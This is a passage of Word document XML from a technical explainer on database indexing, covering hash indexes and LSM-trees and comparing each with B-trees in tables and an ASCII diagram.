          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Concurrent access:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Well-studied locking protocols (page-level locks, latch crabbing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0CE5A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>40+ years of production refinement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3207F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="08352346">
          <v:rect id="_x0000_i5323" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A926008" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Other Index Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B0015" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Hash Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BECBB1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639929A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEE7A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>hash(key) → bucket_number → bucket contains [key, row_pointer] pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53697CD5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="10E6D3B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Lookup: hash('alice@example.com') = 4721 → read bucket 4721 → find row pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0253FEC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Characteristics: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85"/>
        <w:gridCol w:w="3334"/>
        <w:gridCol w:w="2351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="4961DE2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60D03B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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216862" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hash Index</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AE7F99" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>B-Tree Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="530C2C5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93981E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Point lookup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3F819B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(1) — fastest possible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5BCE74" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>O(log n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="2DBF6BB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0E6E69" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Range scan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AE7355" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12791">
              <w:t xml:space="preserve"> IMPOSSIBLE (no ordering)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8B5EC4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>✓ Efficient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="47DC811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93C4D0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Sorting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F23308" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12791">
              <w:t xml:space="preserve"> Cannot sort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9CA115" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>✓ Pre-sorted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="27613D7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52113F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Prefix matching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6C8450" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00A12791">
              <w:t xml:space="preserve"> No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1CD698" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>✓ Yes (LIKE 'abc%')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="6A6A0A1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80CE0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Space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6E0AA3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Compact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9AEC59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="359C2AC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111236" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Use case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F4418A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Exact equality lookups ONLY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830D25" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>General purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43211C42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6845EA43" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>PostgreSQL: hash indexes (limited use).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3907D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Memcached/Redis: internal hash table for O(1) key lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEDEA50" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>MySQL MEMORY engine: hash indexes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1542F5E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>In-memory databases: hash indexes for primary key lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E055B1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When to use:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Only when you EXCLUSIVELY need exact equality lookups (WHERE email = ?) and NEVER range queries, sorting, or prefix matching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4438AC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 LSM-Tree (Log-Structured Merge-Tree)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F025D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works (high-level):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A8892" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37661A56" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D3227" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Write to in-memory buffer (memtable) — sorted tree (e.g., red-black tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C49E500" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. When memtable is full → flush to disk as a sorted file (SSTable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2FAE2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Background compaction merges SSTables into larger, sorted files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF6752" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="40EBAFF9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Read path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCAAE9D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>1. Check memtable (newest data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769977A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>2. Check each SSTable level (newest to oldest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788F36F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>3. Use Bloom filters to skip SSTables that definitely don't contain the key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293CE66B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2060695F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB71477" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  Memtable   │   (in-memory, writes go here first)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398E07C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ (sorted)    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE8EB48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54971B1F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       │ flush when full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F858BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29713AC1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E7CDC2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  Level 0    │   (recently flushed SSTables, may overlap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD8EE7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│ SST SST SST │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EFFE78" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C023787" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       │ compaction (merge sort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1932A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8E6D7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CAC88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  Level 1    │   (merged, non-overlapping SSTables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF3C2EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  SST  SST  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A2963" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└──────</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07627770" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       │ compaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CA734" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7537B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>┌─────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A4424" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>│  Level 2    │   (larger, older data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C24E43A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>│    SST      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E548C64" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>└─────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9AB3F6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Characteristics: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208"/>
        <w:gridCol w:w="3994"/>
        <w:gridCol w:w="3148"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="76D0159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F6EA30" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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831D28" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LSM-Tree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02930C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>B-Tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="2049A77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D920B7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Write throughput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C8E4D2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Very high (sequential writes)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FF2C0C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Moderate (random writes for updates)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="148F232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A98725" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Write amplification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B28244" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Higher (compaction rewrites data multiple times)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3C2CC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="1AA2F48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44DDBF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Read latency (point)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FBB9E9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Higher (check multiple levels + Bloom filter)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17EB18" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Lower (single tree traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="60F92EE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8C905F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Read latency (range)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8B93D5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
